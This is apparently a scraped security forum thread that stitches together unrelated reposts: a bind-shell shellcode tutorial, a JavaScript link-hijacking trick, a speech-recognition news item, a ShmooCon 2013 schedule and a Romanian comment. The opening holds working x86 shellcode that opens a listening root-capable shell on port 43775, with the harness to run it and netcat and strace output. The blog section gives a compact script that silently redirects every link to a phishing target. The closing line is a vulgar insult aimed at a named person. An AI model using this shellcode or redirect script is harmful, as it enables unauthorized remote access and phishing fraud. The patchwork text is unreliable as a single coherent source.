"\x31\xc0\xb0\x66\x31\xdb\x43\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xeb\x50\x5f\x6a\x66\x58\x43\x31\xd2\x52\x66\xff\x37\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\x43\x43\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\xe8\xab\xff\xff\xff\xaa\xff"; main() { printf("Shellcode Length: %d\n", strlen(code)); int (*ret)() = (int(*)())code; ret(); } [h=3]Compiling and executing a shellcode[/h] arno $ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode arno $ ./shellcode Shellcode Length: 108 root # netstat --inet -apn |grep -i shellcode tcp 0 0 0.0.0.0:43775 0.0.0.0:* LISTEN 11137/./shellcode It appears to be our shellcode has been executed and listening on 43775/tcp port as expected. [h=3]Connecting to a shell[/h] root # nc localhost 43775 id uid=500(arno) gid=500(arno) groups=500(arno) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 date Sat Mar 9 13:59:11 CET 2013 quit //bin/sh: line 3: quit: command not found exit As you may have noticed, it is exactly our shell spawned (execve “//bin/sh”) while we tried to run a command that doesn’t exist on a server. [h=3]Shellcode emulation and visualization[/h] $ strace -e socket,bind,listen,accept,dup2,execve ./shellcode execve("./shellcode", ["./shellcode"], [/* 57 vars */]) = 0 [ Process PID=18644 runs in 32 bit mode. ] Shellcode Length: 141 socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 3 bind(3, {sa_family=AF_INET, sin_port=htons(43775), sin_addr=inet_addr("0.0.0.0")}, 16) = 0 listen(3, 1) = 0 accept(3, 0, NULL) = 4 dup2(4, 0) = 0 dup2(4, 1) = 1 dup2(4, 2) = 2 execve("//bin/sh", ["//bin/sh"], [/* 26 vars */]) = 0 [ Process PID=18644 runs in 64 bit mode. ] socket(PF_FILE, SOCK_STREAM|SOCK_CLOEXEC|SOCK_NONBLOCK, 0) = 5 socket(PF_FILE, SOCK_STREAM|SOCK_CLOEXEC|SOCK_NONBLOCK, 0) = 5 --- SIGCHLD (Child exited) @ 0 (0) --- For better understanding, I suggest to look at the visualization together with the shellcode source that is very detailed —> shell_bind_tcp.nasm libemu was used to visualize the shellcode. Next assignment – Shell_Reverse_TCP shellcode is coming soon! Sursa: Shell bind TCP shellcode | NIXAID.COM

Failures of secret-key cryptography D. J. Bernstein University of Illinois at Chicago & Technische Universiteit Eindhoven 2011 Grigg Gutmann: In the past 15 years no one ever lost money to an attack on a properly designed cryptosystem (meaning one that didn't use homebrew crypto or toy keys) in the Internet or commercial worlds". Download: http://cr.yp.to/talks/2013.03.12/slides.pdf

[h=1]Hacking the <a> tag in 100 characters[/h] ? 17 March 2013 / 439 words / Facebook / Twitter / Discuss on HN A short while ago, I discovered that JavaScript allows you to change the <a> href after you click on it. It may not seem that serious at first glance, but rest assured, it can trick customers into giving in their details to fraudsters. Let me show you an example. This link should take you to PayPal. You'll see that you do not end up on PayPal (except on Opera, where it appears to have been fixed). That's because when you clicked on the link, I ran some code that changed the href attribute and, surprisingly, the browser sent me to the new link. That shouldn't happen. Website visitors (and perhaps most tech-savvy people) can and will presume where they end up could just be a genuine redirection from, in this case, PayPal. Last year, PayPal redirected their UK homepage to paypal-business.co.uk for months. My assumption is website visitors have grown accustom to redirections, and if this flaw acts as such, it can pose a real threat to what I call Phishing 2.0. Let's take a look at the JavaScript: // Uncompressed var links = document.getElementsByTagName('a'); for(var i=0; i < links.length; i++){ links[i].onclick = function(){ this.href = 'http://bit.ly/141nisR'; // Insert link here }; } // Compressed (100 characters exc. the link) o=document.getElementsByTagName('a');for(j=0;j<o.length;j++){o[j].onclick=function(){this.href='http://bit.ly/141nisR';}} It's also very difficult to detect. Almost everyone who uses JavaScript/jQuery will bind an event to an <a> tag, so it's not as simple as unbinding every <a> onclick function. It's very much possible to wrap the code above to a setTimeout to bypass whatever solution can be found. Any half-decent hacker can make a computer virus or embeddable JavaScript code that can inject this code alongside another piece of software. As it's incredibly easy to update JavaScript (particularly embeddable), I would say that tools such as McAfeeSecure and PhishTank won't be able to keep up with phishing websites up to the second. As it shows no real benefit, I'm pledging to World Wide Web Consortium (W3C) and major browsers to disable the option to change the href attribute after an onclick event. It is an incredibly simple interpreter flaw, and whilst it may seem normal to some, it can be used for ill-fated purposes rather than good. I'm aware Google and websites as such use this, but if we're suppose to making the web safer, we can't allow for what can be simple flaws to exist. There are alternatives (such as using the genuine link rather than masking it), and for that reason, it should be disabled. It's not worth internet users being victims of fraud and theft. Sursa: Hacking the <a> tag in 100 characters

[h=2]Developer releases source code of Linux speech recognition program[/h] Posted by Swapnil Bhartiya 17Mar2013 Independent developer James McClain has developed a program which uses Google Voice API in the back-end to conduct various tasks on a GNU/Linux machine, just the way Siri does on the iDevices. The program allows a user to open sites, ask questions and perform other tasks just by voice. While initially developed for Ubuntu it is distro agnostic and can be used by other distributions as well. The developer was running a private beta to further improve the project and has now released the source code under GNU GPL v3 licence. Watch the video below to see what this program of capable of doing. You can grab the source code from GitHub. We are experimenting with editor picked 'user comments'. If your comment contributes to the story we will add your comment to the story, with attribution. So, go ahead and tell us what you think. Comments posted on our Google+ page will also be considered. Sursa: Developer releases source code of Linux speech recognition program | Muktware

ShmooCon 2013 [TABLE=width: 80%, align: center] [TR] [TH=colspan: 2]Friday, February 15, 2013[/TH] [/TR] [TR] [TH=width: 10%] Time [/TH] [TH=width: 60%] [/TH] [/TR] [TR] [TD=align: center] 1200 [/TD] [TD=colspan: 1, align: center]Registration Opens[/TD] [/TR] [TR] [TD=align: center] 1430 [/TD] [TD=colspan: 1, align: center]Opening Remarks and Rants Bruce Potter Video [/TD] [/TR] [TR] [TD=align: center] 1530 [/TD] [TD=colspan: 1, align: center] How to Own a Building: Exploiting the Physical World with BacNET and the BacNET Attack FrameworkBrad Bowers Video [/TD] [/TR] [TR] [TD=align: center] 1600 [/TD] [TD=colspan: 1, align: center] Mainframed: The Secrets Inside that Black BoxPhil Young Video [/TD] [/TR] [TR] [TD=align: center] 1630 [/TD] [TD=colspan: 1, align: center] WIPE THE DRIVE!!! - Techniques for Malware PersistenceMark Baggett and Jake Williams Video Slides [/TD] [/TR] [TR] [TD=align: center] 1700 [/TD] [TD=colspan: 1, align: center] Apple iOS Certificate TomfooleryTim Medin Video [/TD] [/TR] [TR] [TD=align: center] 1730 [/TD] [TD=colspan: 1, align: center] Hide and Seek, Post-Exploitation StyleTJ O'Connor and Tim Tomes Video [/TD] [/TR] [TR] [TD=align: center] 1800 [/TD] [TD=colspan: 1, align: center] Bringing The Sexy Back To...Defense In DepthMartin Fisher [/TD] [/TR] [TR] [TD=align: center] 1830 [/TD] [TD=colspan: 1, align: center] Hackers get Schooled: Learning Lessons from AcademiaBruce Potter (moderator), Matt Blaze, Chris Eagle, Invisigoth, Dave Marcus and Michael Schearer Video [/TD] [/TR] [TR] [TD=align: center] 2000 [/TD] [TD=colspan: 1, align: center]Video [/TD] [/TR] [/TABLE] [TABLE=width: 80%, align: center] [TR] [TH=colspan: 4] Saturday, February 16, 2013 [/TH] [/TR] [TR] [TH=width: 5%] Time [/TH] [TH=width: 20%] Build It! [/TH] [TH=width: 20%] Belay It! [/TH] [TH=width: 20%] Bring it On! [/TH] [/TR] [TR] [TD=align: center] 0930 [/TD] [TD=colspan: 3, align: center]Registration Opens[/TD] [/TR] [TR] [TD=align: center] 1000 [/TD] [TD=align: center] Running a CTF .. Panel and DIscussion on the Art of Hacker GamingBranson Matheson, Brett Thorson, Liam Randall, Jordan Wiens, Tyler Nighswander Video [/TD] [TD=align: center] C10M: Defending the Internet at ScaleRobert Graham Video [/TD] [TD=align: center] Paparazzi over IPDaniel Mende and Pascal Turbing Video [/TD] [/TR] [TR] [TD=align: center] 1100 [/TD] [TD=align: center] DIY: Using Trust to Secure Embedded ProjectsTeddy Reed and David Anthony Video [/TD] [TD=align: center] Moloch: A New and Free Way To Index Your Packet Capture RepositoryAndy Wick and Eoin Miller Video [/TD] [TD=align: center] OpenStack Security BriefMatthew Joyce Video [/TD] [/TR] [TR] [TD=align: center] 1200 [/TD] [TD=align: center] Generalized Single Packet Authorization for Cloud Computing EnvironmentsMichael Rash Video [/TD] [TD=align: center] From "Shotgun Parsers" to Better Software StacksMeredith Patterson, Sergey Bratus and Dan TQ Hirsh Video [/TD] [TD=align: center] The Computer Fraud and Abuse Act: Swartz, Auernheimer, and BeyondOrin Kerr and Marcia Hoffman Video [/TD] [/TR] [TR] [TD=align: center] 1300 [/TD] [TD=colspan: 3, align: center]Lunch[/TD] [/TR] [TR] [TD=align: center] 1400 [/TD] [TD=align: center] Malware Analysis: Collaboration, Automation & TrainingRichard Harman Video [/TD] [TD=align: center] Bright Shiny Things: Why We Need Intelligent Data Access ControlsBob Bigman, Craig Rosen, David Ferraiolo, Mark McGovern Video [/TD] [TD=align: center] Ten Strategies of a World-Class Computer Security Incident Response TeamCarson Zimmerman Video [/TD] [/TR] [TR] [TD=align: center] 1500 [/TD] [TD=align: center] Armor for your Android AppsRoman Faynberg Video [/TD] [TD=align: center] Protecting Sensitive Information on iOS DevicesDavid Schuetz Video [/TD] [TD=align: center] Beyond Nymwars: An Analysis of the Online Identity BattlegroundAestetix Video [/TD] [/TR] [TR] [TD=align: center] 1600 [/TD] [TD=align: center] How Smart Is Bluetooth Smart?Mike Ryan Video [/TD] [TD=align: center] Chopshop: Busting the Gh0stWesley Shields and Murad Khan Video [/TD] [TD=align: center] The Cloud - Storms on the HorizonTyler Pitchford Video [/TD] [/TR] [TR] [TD=align: center] 1700 [/TD] [TD=align: center] 0wn the ConThe Shmoo Group Video [/TD] [TD=align: center] PunkSPIDER: An Open Source, Scalable Distributed Fuzzing Project Targeting the Entire InternetAlejandro Caceres Video [/TD] [TD=align: center] Crypto: You're doing it wrongRon Bowes Video [/TD] [/TR] [TR] [TD=align: center] 1830 [/TD] [TD=colspan: 3, align: center]Fire Talks[/TD] [/TR] [TR] [TD=align: center] 2000 [/TD] [TD=colspan: 3, align: center]Saturday Night Party @ TBD[/TD] [/TR] [/TABLE] [TABLE=width: 80%, align: center] [TR] [TH=colspan: 4] Sunday, February 17, 2013 [/TH] [/TR] [TR] [TH=width: 5%] Time [/TH] [TH=width: 20%] Build It! [/TH] [TH=width: 20%] Belay It! [/TH] [TH=width: 20%] Bring it On! [/TH] [/TR] [TR] [TD=align: center] 0930 [/TD] [TD=colspan: 3, align: center]Registration Opens[/TD] [/TR] [TR] [TD=align: center] 1000 [/TD] [TD=align: center] Identity-Based Internet Protocol NetworkDavid Pisano Video [/TD] [TD=align: center] NSM and more with Bro Network MonitorLiam Randall Video [/TD] [TD=align: center] These Go to Eleven: When the Law Goes Too FarMichael Schearer Video [/TD] [/TR] [TR] [TD=align: center] 1100 [/TD] [TD=align: center] Forensics - ExFat Bastardized for CamerasScott Moulton Video [/TD] [TD=align: center] Page Fault Liberation Army or Better Security Through TrappingJulian Bangert and Sergey Bratus Video [/TD] [TD=align: center] Hacking as an Act of WarGmark Hardy Video [/TD] [/TR] [TR] [TD=align: center] 1200 [/TD] [TD=align: center] MASTIFF: Automated Static Analysis FrameworkTyler Hudak Video [/TD] [TD=align: center] Attacking scada Wireless Systems for Fun and Profit - and FixingAtlas Video [/TD] [TD=align: center] Ka-ching! How to Make Real MoneyMargaret Russell Video [/TD] [/TR] [TR] [TD=align: center] 1300 [/TD] [TD=colspan: 3, align: center]Room Split Break[/TD] [/TR] [TR] [TD=align: center] 1330 [/TD] [TD=colspan: 3, align: center] Is Practical Information Sharing Possible?Sean Barnum, Doug Wilson, Ben Miller Video [/TD] [/TR] [TR] [TD=align: center] 1430 [/TD] [TD=colspan: 3, align: center]Closing Remarks[/TD] [/TR] [/TABLE] Copyright © 2012 ShmooCon Sursa: ShmooCon 2013 - February 15-17 - ShmooCon 2013

Download Microsoft Mathematics 4.0 from Official Microsoft Download Center MATLAB - The Language of Technical Computing

Duminica, 18:00, la "Romania, te iubesc". Infractionalitatea cibernetica, un fenomen mai periculos decat terorismul pentru viitor Cine pula mea e ratatu ala cu 9 clase? Edit: E Iceman (Robert Butyka), fara dinti si fara gramatica.